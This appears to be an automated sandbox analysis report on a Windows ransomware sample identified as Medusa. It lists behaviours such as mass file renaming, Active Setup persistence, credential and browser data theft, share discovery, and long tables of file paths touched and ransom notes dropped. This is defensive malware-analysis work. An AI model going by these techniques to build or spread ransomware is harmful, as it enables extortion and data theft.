Max time kernel

94s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe"

Signatures

Medusa Ransomware

ransomware medusaransomware

Renames multiple (8807) files with added filename extension

ransomware

Boot or Logon Autostart Execution: Active Setup

persistence
Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A

Credentials from Password Stores: Windows Credential Manager

credential_access stealer

Drops startup file

Description | Indicator | Process | Target
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!!!READ_ME_MEDUSA!!!.txt | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!!!READ_ME_MEDUSA!!!.txt | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A

Reads user/profile data of web browsers

spyware stealer

Drops desktop.ini file(s)

Description | Indicator | Process | Target
File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Users\Admin\Documents\desktop.ini | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | F:\$RECYCLE.BIN\S-1-5-21-1194130065-3471212556-1656947724-1000\desktop.ini | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Users\Admin\Favorites\Links\desktop.ini | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Users\Admin\Pictures\Camera Roll\desktop.ini | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Users\Public\Desktop\desktop.ini | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\desktop.ini | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Users\Admin\Contacts\desktop.ini | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Users\Public\Pictures\desktop.ini | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Users\Admin\Pictures\Saved Pictures\desktop.ini | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Users\Admin\Saved Games\desktop.ini | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Users\Admin\Favorites\desktop.ini | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Users\Admin\Links\desktop.ini | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn2\desktop.ini | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\$Recycle.Bin\S-1-5-21-1194130065-3471212556-1656947724-1000\desktop.ini | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Users\Admin\Desktop\desktop.ini | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Users\Public\desktop.ini | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Program Files\desktop.ini | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\desktop.ini | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Users\Public\Documents\desktop.ini | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Program Files (x86)\desktop.ini | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Users\Admin\Searches\desktop.ini | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Users\Public\Music\desktop.ini | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Users\Admin\OneDrive\desktop.ini | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Users\Admin\Downloads\desktop.ini | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Users\Public\AccountPictures\desktop.ini | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Users\Admin\Pictures\desktop.ini | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Users\Admin\Videos\desktop.ini | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn1\desktop.ini | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A

Network Share Discovery

discovery

Drops file in Program Files directory

Description | Indicator | Process | Target
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ca-es\!!!READ_ME_MEDUSA!!!.txt | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Program Files\ImportRestart.xht | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Orange Red.xml | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchSquare44x44Logo.targetsize-96_altform-unplated_contrast-black.png | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\ru-ru\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File created | C:\Program Files\Crashpad\attachments\!!!READ_ME_MEDUSA!!!.txt | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\BORDERS\!!!READ_ME_MEDUSA!!!.txt | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.scale-150_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-16_altform-lightunplated.png | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.targetsize-20.png | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubAppList.targetsize-36_altform-unplated_contrast-high.png | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\XboxNano.winmd | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\ipsrus.xml | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\comments.win32.bundle | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsAlarms_10.1906.2182.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\StopwatchSmallTile.contrast-white_scale-125.png | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteSectionGroupMedTile.scale-400.png | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\!!!READ_ME_MEDUSA!!!.txt | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Program Files\Common Files\System\ado\de-DE\!!!READ_ME_MEDUSA!!!.txt | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\root\!!!READ_ME_MEDUSA!!!.txt | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Program Files\Common Files\System\msadc\de-DE\msdaremr.dll.mui | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Program Files\Common Files\System\Ole DB\ja-JP\oledb32r.dll.mui | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File created | C:\Program Files\Microsoft Office\root\Office16\MSIPC\lv\!!!READ_ME_MEDUSA!!!.txt | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\CroppedImage.xbf | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxCalendarSplashLogo.scale-125.png | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\!!!READ_ME_MEDUSA!!!.txt | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ko-kr\!!!READ_ME_MEDUSA!!!.txt | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\nl-nl\!!!READ_ME_MEDUSA!!!.txt | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\sv-se\!!!READ_ME_MEDUSA!!!.txt | C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe | N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\Install\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Templates\1033\EssentialReport.dotx C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\RNApp\app\uwp\images\import_google_contacts\googleImportNoResults.png C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\ExchangeBadge.scale-125.png C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\LinkedInboxSmallTile.scale-100.png C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\models\en-GB.PostalAddress.ot C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ko-kr\ui-strings.js C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PowerPoint2019VL_KMS_Client_AE-ul.xrm-ms C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019VL_KMS_Client_AE-ppd.xrm-ms C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Viewpoints\Dark\MilitaryRight.png C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\InsiderHubAppList.targetsize-48_altform-unplated_devicefamily-colorfulunplated.png C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\back-arrow-focus.svg C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File created C:\Program Files (x86)\Common Files\System\uk-UA\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\BORDERS\MSART5.BDR C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\Assets\Images\SkypeTile.scale-200_contrast-black.png C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_neutral_split.scale-100_8wekyb3d8bbwe\microsoft.system.package.metadata\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\oskclearui\oskclearuibase.xml C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\Assets\Fonts\SkypeAssets-Medium.ttf C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Collections\contrast-white\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeStudent2019R_OEM_Perp-ul-oob.xrm-ms C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
